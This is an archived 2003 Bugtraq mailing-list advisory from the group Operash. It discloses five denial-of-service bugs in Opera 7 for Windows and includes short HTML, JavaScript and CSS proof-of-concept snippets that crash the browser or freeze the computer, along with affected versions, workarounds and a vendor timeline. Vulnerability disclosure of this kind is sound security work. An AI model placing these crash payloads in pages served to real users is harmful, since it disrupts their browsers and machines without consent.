lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030701003027.3713.NESUMIN@softhome.net>
Date: Tue, 01 Jul 2003 00:45:28 +0900
From: ":: Operash ::" <nesumin@...thome.net>
To: bugtraq@...urityfocus.com
Subject: [Opera 7] Five DoS codes on general web sites


---------------------------------------------------------------------------------
TITLE          :[Opera 7] Five DoS codes on general web sites
                -= Fastest browser on earth, Fastest crash on earth too =-
PRODUCT        : Opera for Windows
VERSIONS       : 7.11b build 2887
                 7.11  build 2880
                 7.10  build 2840
                 7.03  build 2670
VENDOR         : Opera Software ASA (http://www.opera.com/)
SEVERITY       : Medium.
                 Abnormal Termination, Freeze, and DoS attacks.
DISCOVERED BY  : imagine, nesumin
AUTHOR         : :: Operash ::
REPORTED DATE  : 2003-06-24
PUBLISHED DATE : 2003-07-01
----------------------------------------------------------------------------------

0. PRODUCT INFORMATION
========================

  Opera for Windows is a GUI base Web browser.
  Opera Software ASA (http://www.opera.com/)


1. DESCRIPTION
================

  There are many unfixed bugs that cause abnormal termination
  or freeze down in Opera 7.
  Exploiting these bugs, attackers can do DoS attacks.

  Followings are 5 sample codes, which are in general web sites.


2. SAMPLE CODE & IMPACT
=========================

  [ CODE 1 ]

    Just 12 bytes data "<!DOCTYPE" + NULL(\x00) + 1byte + ">" makes
    CPU usage go up to 100%(depending on comp specs) and the computer
    gets freeze down.

    -----------------------------------------------------------------
      <!DOCTYPE[\x00]A>
    -----------------------------------------------------------------


  [ CODE 2 ]

    Abnormal termination is caused.

    -----------------------------------------------------------------
      <form></form><script>document.forms[0].submit()</script>
    -----------------------------------------------------------------


  [ CODE 3 ]

    Abnormal termination is caused.

    -----------------------------------------------------------------
      <table>
      <tr id="crash" style="display:inline"><td>
      <script>crash.style.display = "none";</script>
      </td></tr>
      </table>
    -----------------------------------------------------------------


  [ CODE 4 ]

    Abnormal termination is caused.

    -----------------------------------------------------------------
      <table>
      <map id="crash" style="position:absolute"></map>
      <script>crash.style.height = crash.style.width = '0';</script>
      </table>
    -----------------------------------------------------------------


  [ CODE 5 ]

    CPU usage go up to 100%(depending on comp specs) and the computer
    gets freeze down.

    -----------------------------------------------------------------
      <html>
      <head>
        <style type="text/css">
        <!--
        .aaaaa:after{content:"A";display:block}
        .bbbbb{display:run-in}
        .ccccc{display:inline-block}
        //-->
        </style>
      </head>
      <body>
      <div class="aaaaa">
       <div class="bbbbb">
        <div class="ccccc">
        </div>
       </div>
      </div>
      </body>
      </html>
    -----------------------------------------------------------------


3. SYSTEMS AFFECTED
=====================

  Opera (For Windows)
    7.11b build 2887
    7.11  build 2880
    7.10  build 2840
    7.03  build 2670 (Excepting [ CODE 5 ])
    Lower than 7.03 Versions might be affected too. (not tested)


4. EXAMINES
=============

  Opera (For Windows, English/Japanese) :
    7.11b build 2887
    7.11  build 2880
    7.10  build 2840
    7.03  build 2670

  Platform :
    Windows 98SE Japanese Edition
    Windows 2000 Pro SP3 Japanese Edition


5. WORKAROUND
===============

  [ CODE 1 ]  -----
  [ CODE 2 ]  Disable "JavaScript"
  [ CODE 3 ]  Disable "JavaScript"
  [ CODE 4 ]  Disable "JavaScript"
  [ CODE 5 ]  Disable "CSS Author mode"


6. TIME TABLE & VENDOR STATUS
===============================

  2003-06-24 Reported to vendor.
  2003-07-01 Released this advisory.

  No reply from vendor.


7. DISCLAIMER
===============

  A. We cannot guarantee the accuracy of all statements in this information.
  B. We do not anticipate issuing updated versions of this information
     unless there is some material change in the facts.
  C. And we will take no responsibility for any kinds of disadvantages by
     using this information.
  D. You can quote this advisory without our permission if you keep the following;
     a. Do not distort this advisory's content.
     b. A quoted place should be a medium on the Internet.
  E. If you have any questions, please contact to us.


  * Exception

     We strictly forbid 'Secunia' to republish or redistribute our advisory.

          ...Well, even though, we know this request would be ignored.

          The CTO of Secunia has told us;
            "If you do not want us to write about your vulnerabilities -
             then stop posting them!"

          Well.. We can do nothing for this sort of arrogance :/


8. CONTACT, ETC
=================

  :: Operash ::

  imagine (Operash Webmaster)
  nesumin <nesumin@...thome.net>


  Thanks to :

    melorin
    piso(sexy)





Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ